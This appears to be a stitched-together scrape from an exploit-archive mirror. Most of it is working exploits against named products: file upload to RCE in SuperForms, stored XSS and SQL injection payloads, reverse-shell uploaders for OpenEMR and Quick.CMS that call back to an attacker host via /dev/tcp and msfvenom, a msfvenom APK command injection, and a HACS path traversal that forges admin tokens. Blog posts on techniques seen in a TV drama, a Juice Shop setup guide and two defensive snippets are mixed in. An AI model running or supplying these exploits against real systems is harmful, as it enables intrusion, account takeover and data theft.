    "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT"
}

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)

# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)

WordPress Plugin SuperForms 4.9 - Arbitrary File Upload

# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)

# data in http request :

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1          <=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF          <======= inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]"; filename="filename.(extension)"          <==== inject code extension (.php4) for example
Content-Type: application/pdf

Evil codes to be uploaded
-----------------------------423513681827540048931513055996--

# Uploaded Malicious File can be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4
# You can get <id> from the server reply.
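The request above works because the upload handler reads its allowlist from the accept_file_types field the client sends, so the uploader can widen it with |PHP4. As an added example (not the plugin's code; the server-side policy, the case-insensitive matching and the multipart body are assumptions and constructions made here), the following parses a body modelled on that request and contrasts a check driven by the request-supplied pattern with one the server owns:

```python
import re

# Constructed multipart body modelled on the request above (boundary shortened);
# the file content is inert placeholder text.
BOUNDARY = "----boundary42"
SAMPLE_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="accept_file_types"\r\n\r\n'
    "jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF|PHP4\r\n"
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="max_file_size"\r\n\r\n'
    "8000000\r\n"
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="files[]"; filename="filename.php4"\r\n'
    "Content-Type: application/pdf\r\n\r\n"
    "placeholder file content\r\n"
    "--" + BOUNDARY + "--\r\n"
)

# Server-owned policy (assumed): the allowlist never comes from the request.
SERVER_ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf"}


def parse_multipart(body: str, boundary: str):
    """Minimal multipart/form-data reader: {field name: (filename or None, content)}."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if part in ("", "--"):
            continue
        head, _, content = part.partition("\r\n\r\n")
        name = re.search(r';\s*name="([^"]+)"', head).group(1)
        fn = re.search(r';\s*filename="([^"]*)"', head)
        fields[name] = (fn.group(1) if fn else None, content)
    return fields


def accepted_by_client_pattern(filename: str, pattern: str) -> bool:
    """Mirrors a check whose allowlist is the alternation the client sent
    (case-insensitive matching assumed): anything appended to it is accepted."""
    return re.search(r"\.(" + pattern + r")$", filename, re.IGNORECASE) is not None


def accepted_by_server_policy(filename: str) -> bool:
    """Server-side check: exactly one extension, lower-cased, in the fixed set.
    Double extensions such as 'shell.php4.pdf' are refused outright."""
    stem, dot, ext = filename.lower().rpartition(".")
    if not dot or not stem or "." in stem:
        return False
    return ext in SERVER_ALLOWED


def check_upload(body: str, boundary: str):
    """(client pattern verdict, server policy verdict, filename) for the uploaded file."""
    fields = parse_multipart(body, boundary)
    pattern = fields["accept_file_types"][1]
    filename = fields["files[]"][0]
    return accepted_by_client_pattern(filename, pattern), accepted_by_server_policy(filename), filename


if __name__ == "__main__":
    client_ok, server_ok, name = check_upload(SAMPLE_BODY, BOUNDARY)
    print(name, "client pattern:", client_ok, "server policy:", server_ok)
```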

BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting

# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting
# Exploit Author: LiPeiYi
# Date: 2020-12-18
# Vendor Homepage: https://www.bloofox.com/
# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
# Version: 0.5.1.0 - 0.5.2.1
# Tested on: windows 10

Vulnerable page: /admin/include/inc_content_articles.php

Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side.
2: Add a new post, put the payload <img src=# onerror=alert('xss')> in the "text" parameter and click on the save button. The post is saved successfully.
3: The XSS is now stored and triggers every time the article is viewed, so an attacker can steal authenticated users' cookies.

Online Grading System 1.0 - 'uname' SQL Injection

# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
# Date: 2021-01-28
# Exploit Author: Ruchi Tiwari
# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------
# Vulnerable parameter: uname

# Injected Request

POST /onlinegradingsystem/admin/login.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
Upgrade-Insecure-Requests: 1

uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=

# Application will load after 20 minutes.
--------------------------------------------------------------------------------------------------------------------

MyBB Hide Thread Content Plugin 1.0 - Information Disclosure

# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure
# Date: 1/27/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1430
# Version: 1.0
# Tested on: Windows 10
# CVE: CVE-2021-3337

1. Description:
This plugin hides thread content until the user replies to the thread. The information disclosure is that the hidden content can be viewed without replying.

2. Proof of Concept:
- Visit a post where content is hidden
- Click the reply or quote button below it
The thread content will be displayed inside the [quote] bracket without needing to reply.

Simple Public Chat Room 1.0 - Authentication Bypass SQLi

# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /chat/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
Referer: http://localhost/chat/index.php?attempt=
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl
Upgrade-Insecure-Requests: 1

username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--

Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting

# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Replicates across chat sessions.

POST /chat/send_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 58
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl

msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1

MyBB Delete Account Plugin 1.4 - Cross-Site Scripting

# Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting
# Date: 1/25/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/
# Version: 1.4
# Tested on: Windows 10

1. Description:
This plugin allows users to delete their account. The reason given for deleting your account is vulnerable to XSS.

2. Proof of Concept:
- Go to User CP -> Delete Account
- Input a payload as the delete account reason: <script>alert('XSS')</script>

Payload will execute here: admin/index.php?module=user-deleteaccount
HireHackking

OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)

# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-07-16
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3
# References: https://www.exploit-db.com/exploits/48515

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

shell_name = 'shell4.php'
user = 'openemr_admin'
password = 'xxxxxx'
payload = 'php/reverse_php'
lhost = '10.10.15.201'
lport = 8888

doc = <<~DOCOPT
  OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution

  Usage:
    #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
    #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
    #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
    -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
    -u <username>, --user <username>      Username of the admin
    -p <password>, --password <password>  Password of the admin
    -m <payload>, --payload <payload>     Metasploit PHP payload
    -h <host>, --lhost <host>             Reverse shell local host
    -t <port>, --lport <port>             Reverse shell local port
    --debug                               Display arguments
    -H, --help                            Show this screen

  Examples:
    #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
    #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
    #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
DOCOPT

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  if args['manual']
    shell_name = File.basename(args['--shell'])
    shell_path = args['--shell']
  else
    shell_name = "tmp#{rand(1000)}.php"
    shell_path = shell_name
  end

  if args['semi-auto']
    payload = args['--payload']
  else
    payload = 'php/reverse_php'
  end

  # Authentication data
  uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default")
  data_1 = {
    'new_login_session_management' => '1',
    'authProvider' => 'Default',
    'authUser' => args['--user'],
    'clearPass' => args['--password'],
    'languageChoice' => '1'
  }

  # Reverse shell data
  unless args['manual']
    puts "[+] Generating the reverse shell payload: #{shell_name}"
    %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name})
  end
  data_2 = {
    'site' => 'default',
    'mode' => 'save',
    'docid' => shell_name,
    'content' => File.read(shell_path)
  }
  uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default")
  uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}")

  clnt = HTTPClient.new

  puts '[+] Authenticating'
  clnt.post(uri_1, data_1)

  puts '[+] Uploading the reverse shell'
  clnt.post(uri_2, data_2)

  puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}"
  clnt.get(uri_3)
rescue Docopt::Exit => e
  puts e.message
end
HireHackking

Title: 《你安全吗》 ("Are You Safe?"): an interpretation of the technical aspects

This article only analyzes the techniques that appear in the TV drama and does not explain the plot in detail; watch it yourself if you are interested. PS: the technical analysis follows the order of the plot (episodes 1~4).
The show opens with the first attack technique: a malicious power bank. It looks like an ordinary power bank charging a phone, but while the phone is charging, the power bank is pulling the user's information off it.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220915125414.png
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220915125944.png
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3_20220915130038.png
Implementation principle
This method was covered in my earlier article 《利用树莓派监控女盆友手机》. It is actually very simple: the adb command is used to read information off the phone, and adb can of course also be used to install a shell.
It is easy to do; the only prerequisite is that the phone's developer options are turned on first.
In reality, however, developer options are off by default, so the attack as shown in the drama would not work.
Information Collection

Information collection based on WeChat Moments
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/4_20220915130543.png
WeChat lets non-friends view your ten most recent Moments posts. The protagonist checks the target's latest Moments updates and gathers relevant information from them; from the same posts it is also inferred that the heroine's husband is cheating.
My advice: unless work requires it, turn this feature off in WeChat.
Information collection based on WeChat step counts
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/5_20220915131352.png
WeChat's step count can reveal what someone is doing right now. If it is 8 in the morning, you have just woken up, and a friend's step count is already at 5,000, he is very likely out running or exercising.
Information collection based on phishing links
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/6_20220915131541.png
I have covered similar techniques in an earlier article. A probe link of this kind can obtain the target's IP address, GPS location, photos, audio recordings and so on. As phone security has improved, however, the phone now shows a permission prompt before such access is granted.
Using Baidu Netdisk to back up data
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/7_20220915131932.png
This one comes up often in daily life: once Baidu Netdisk is installed, backing up the address book and other data is enabled by default. You can try it yourself! (It is best to swap the avatar too, so that it looks genuine.)
Using Didi trip sharing
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/8_20220915132245.png
Through the steps above, the protagonist successfully obtained the other party's mobile phone number and then found the associated account through WeChat.
Of course, the network security expert's own computer got infected as well.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/11_20220915132907.png
Cracking the drive
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/14_20220915134645.png
Of course, the director simply handed over the password here. With a password of realistic complexity, it would probably still not be cracked by the time the drama ended.
Controlling the Internet cafe network
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/15_20220915140409.png
This is presumably done with an operations and maintenance app or mini program. Not very difficult.
Applications of Social Engineering
Useful information about the other party is obtained by going through their garbage. So in daily life, if express-delivery and takeout order slips are not disposed of properly, they will leak a certain amount of information.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/16_20220915141013.png
Using the other party's account information, enumerate their other accounts, such as Tieba, Weibo and QQ Zone, to obtain their personal information.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/17_20220915141642.png
WiFi Probe
Some time ago, CCTV's 3.15 program exposed cases of WiFi probes stealing user information. The principle is that when a phone's WLAN is switched on, it broadcasts probe signals to find wireless networks. Once the probe box sees this signal, it can quickly identify the phone's MAC address, map it to an IMEI number, and then map that to a mobile phone number.
Therefore, some companies place these small boxes in shopping malls, supermarkets, convenience stores, office buildings and so on, and collect personal information without the user's knowledge, even big-data profile fields such as marital status, education level and income.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/18_20220915150519.png
Android shell
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/21_20220915151414.png
As can be seen from the video, these are the very basic msf commands for controlling an Android device. Being able to directly operate the phone in the way shown, however, is a bit of an exaggeration.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/22_20220915151649.png
WiFi phishing
Fluxion is used for the WiFi phishing.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/23_20220915154038.png
PS: episodes 4-8; again, only the techniques in the drama are analyzed, not the plot and characters.
Then, to obtain data from the fraud gang, the protagonist sneaks into the computer room to download the server's data.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220916135536.gif
The software used here appears to be Xftp. This is also a physical attack!
Physical Attack
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/R-C_20220916160749.jpg
A so-called physical attack is what an attacker turns to when no usable vulnerability can be found at the software or system level: if the target cannot be taken for the time being, the attacker goes on site, reconnoiters, and gets inside the target through social engineering and similar methods. This kind of attack is the most deadly.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220916141442.gif
Tools used in the network security competition. In the earlier shot, an OWASP tool appears to be used to scan the target website for vulnerabilities. To be honest, the page never moved, so I have no idea what was actually scanned!
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/111_20220916142109.png
After the second layer of defense is breached, the third stage still appears to be the msf interface. The msf parameters are set, but no exploit is ever run, and I do not know what it is waiting for.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/123_20220916142440.png
With three minutes left on the countdown, the SQLmap injection appears to start.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/145_20220916142633.png
As can be seen from the video, the command used is
sqlmap -r 1.txt --batch --level 5 -v --current-user
The use of sqlmap has been covered many times in previous articles. The command above is used to obtain the current database user through POST injection.
Parameter interpretation:
-r 1.txt The target request is stored in a txt file. Generally, burp is used to capture the request and save it as txt.
--batch The user does not need to answer YES or NO during execution; sqlmap's default answer is used so that it runs without interruption.
--level The level of tests to run, default 1. At level 5 many more payloads are tested, and efficiency drops accordingly.
--current-user Gets the current database username.
Summary
The network security tools that appear in the series are all common knowledge in the field. The drama embellishes them slightly, but from a plot perspective it is still very good. In particular, while popularizing network security knowledge for the general public, it ties in topics that touch ordinary people, such as online shills, online fraud, "pig-butchering" scams and online loans. At the end of each episode, some network security knowledge is explained to the audience, which makes it worth recommending!
HireHackking

jQuery UI 1.12.1 - Denial of Service (DoS)

# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
# Date: 20 Jan, 2021
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://jqueryui.com/
# Software Link: https://jqueryui.com/download/
# Version: <= 1.12.1
# CVE : CVE-2020-28488

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
    <h2>DoS - jQuery UI 1.12.1</h2>
    <div>
        <button onclick="exploit()">Exploit</button>
    </div>
    <p>PoC by Rafael Cintra Lopes</p>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
    <script>
        function exploit(){
            for (var i = 0; i < 10; i++) {
                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
            }
        }
    </script>
</body>
</html>
HireHackking
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias,
                       "-storepass", storepass, "-keypass", keypass, "-keyalg", "RSA",
                       "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1",
                       "-keystore", keystore_file, "-storepass", storepass, "-keypass", keypass,
                       apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
HireHackking

Quick.CMS 6.7 - Remote Code Execution (Authenticated)

# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Date: 2020-12-28
# Exploit Author: mari0x00
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
# Version: <= 6.7
# CVE : CVE-2020-35754

#!/usr/bin/python3

import requests
import sys
from termcolor import colored
from time import sleep

print(colored('''###########################################################''',"red"))
print(colored('''######    Quick.CMS authenticated RCE by mari0x00    #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")

if len(sys.argv) != 6:
    print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red")))
    print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red")))
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]

#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}

#Authenticate
print((colored("[+] Attempting user login","blue")))
login_data = {
    "sEmail": username,
    "sPass": password,
    "bAcceptLicense": "1",
    "iAcceptLicense": "true"
}
login = s.post(url+"admin.php?p=login", login_data, headers=headers)
sleep(0.5)

#Exploit
print((colored("[+] Adding shell command","blue")))
payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //"
shell = {
    "sOption": "save",
    "Back_end_only": payload
}
exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers)
sleep(1)

#Triggering reverse shell (three times just in case)
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
sleep(1)
r = s.get(url+"admin.php?p=languages", headers=headers)
HireHackking
# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
# Date: 2021-01-28
# Exploit Author: Lyghtnox
# Vendor Homepage: https://www.home-assistant.io/
# Software Link: https://github.com/hacs/integration
# Version: < 1.10.0
# Tested on: Raspbian + Home Assistant 2021.1.0
# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/

# STEP 1: Run the exploit (python3 exploit.py host port)
# STEP 2: Copy the token printed and set in your browser's local storage with
# the key `hassTokens`

import requests
import jwt
import json
import argparse


class HA:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    def retrieveFile(self, f):
        url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}'
        with requests.Session() as s:
            r = requests.Request(method='GET', url=url)
            prep = r.prepare()
            # keep the raw "../" segments; requests would otherwise normalize them away
            prep.url = url
            try:
                r = s.send(prep, verify=False)
            except requests.exceptions.ConnectionError:
                return
        if r.status_code == 400 or r.status_code == 404:
            return
        return r

    def craftToken(self):
        f = self.retrieveFile('.storage/auth').json()
        # Find owner
        for user in f['data']['users']:
            if user['is_owner']:
                self.owner = user['id']
                break
        else:
            print("No owner found. Using first account")
            self.owner = f['data']['users'][0]['id']

        for token in f['data']['refresh_tokens']:
            if self.owner == token['user_id']:
                encoded_jwt = jwt.encode({'iss': token['id']}, token['jwt_key'], algorithm="HS256")
                self.token = {'access_token': encoded_jwt,
                              'token_type': 'Bearer',
                              'refresh_token': token['token'],
                              'expires_in': 1800,
                              'hassUrl': f"http://{self.ip}:{self.port}",
                              'clientId': token['client_id']}
                return self.token


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit a vulnerability in \
HACS < 1.10.0 to gain admin access to an Home Assistant instance.")
    parser.add_argument("host", type=str, help="IP of the HASS instance")
    parser.add_argument("port", type=int, help="port of the HASS instance")
    args = parser.parse_args()

    r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format(
        ip=args.host, port=args.port))
    if r.status_code != 404:
        print("HACS found! Testing vulnerability...", end='', flush=True)
        ha = HA(args.host, args.port)
        if ha.retrieveFile('configuration.yaml'):
            print(": VULNERABLE")
            token = ha.craftToken()
            if token:
                print(f"Use the following 'hassTokens': {json.dumps(token)}")
            else:
                print("Unable to craft token")
        else:
            print(": Not vulnerable")
HireHackking
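As an added example (not HACS or Home Assistant code), the following shows the containment check a static-file handler needs so that a request path such as /hacsfiles/../../.storage/auth cannot resolve to a file outside the served directory, together with a detector for the same pattern in access-log lines. The directory layout and the log lines are constructed for the demo.

```python
import os
import re
import tempfile
from urllib.parse import unquote


def resolve_static_path(root: str, requested: str):
    """Return the real file path for `requested` under `root`, or None if the
    request escapes the root (via ../, percent-encoded dots, absolute paths or
    symlinks) or does not name a regular file."""
    # Decode twice so a double-encoded "%252e%252e" is seen as ".." as well.
    decoded = unquote(unquote(requested))
    # Resolve symlinks and ".." on both sides before comparing.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None          # resolved outside the served directory
    if not os.path.isfile(candidate):
        return None
    return candidate


# Constructed access-log lines in common log format.
LOG_LINES = [
    '10.0.0.5 - - [28/Jan/2021:10:00:01 +0000] "GET /hacsfiles/iconset.js HTTP/1.1" 200 512',
    '10.0.0.9 - - [28/Jan/2021:10:00:02 +0000] "GET /hacsfiles/../../configuration.yaml HTTP/1.1" 200 2048',
    '10.0.0.9 - - [28/Jan/2021:10:00:03 +0000] "GET /hacsfiles/..%2F..%2F.storage/auth HTTP/1.1" 200 9000',
]

REQUEST_PATH = re.compile(r'"(?:GET|HEAD|POST)\s+(\S+)')


def find_traversal(lines):
    """Return (client_ip, decoded_path) for requests whose decoded path walks upward."""
    hits = []
    for line in lines:
        m = REQUEST_PATH.search(line)
        if not m:
            continue
        path = unquote(unquote(m.group(1)))
        if "/../" in path or path.endswith("/.."):
            hits.append((line.split()[0], path))
    return hits


def demo():
    """Throwaway layout mirroring the bug: the static dir sits two levels below
    the directory that holds the secret .storage/auth file."""
    base = tempfile.mkdtemp()
    static = os.path.join(base, "www", "hacsfiles")
    os.makedirs(static)
    os.makedirs(os.path.join(base, ".storage"))
    open(os.path.join(static, "iconset.js"), "w").close()
    open(os.path.join(base, ".storage", "auth"), "w").close()
    return {
        "legit": resolve_static_path(static, "iconset.js") is not None,
        "plain_traversal": resolve_static_path(static, "../../.storage/auth"),
        "encoded_traversal": resolve_static_path(static, "..%2F..%2F.storage%2Fauth"),
        "absolute": resolve_static_path(static, "/etc/passwd"),
    }


if __name__ == "__main__":
    print(demo())
    print(find_traversal(LOG_LINES))
```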

Title: Installing OWASP Juice Shop on Kali (I)

This vulnerable range was developed by OWASP and covers the OWASP Top Ten, with 47 challenges in total of varying difficulty. OWASP Juice Shop can also be thought of as a hacking game! This article mainly covers deploying the OWASP Juice Shop environment.
Environment
Kali 2022, Docker
What is Docker
Docker is an open-source application container engine written in Go and released under the Apache 2.0 license. Docker lets developers package their applications and dependencies into a lightweight, portable container and publish it to any popular Linux machine, or run it virtualized. Containers are fully sandboxed and have no interface to one another (similar to iPhone apps). More importantly, the performance overhead of a container is extremely low, and it uses few system resources.
Installing Docker
Installing Docker on Kali is very simple; we only need to run the following commands.
apt-get update
apt-get install docker
Using Docker to install OWASP Juice Shop
Run the following command:
docker pull bkimminich/juice-shop
This pulls the OWASP image with Docker so it can be run directly in Docker, which skips the environment setup entirely!
Run
docker run -d -p 3000:3000 bkimminich/juice-shop
Now we only need to open kaliip:3000 in the browser.
A first try
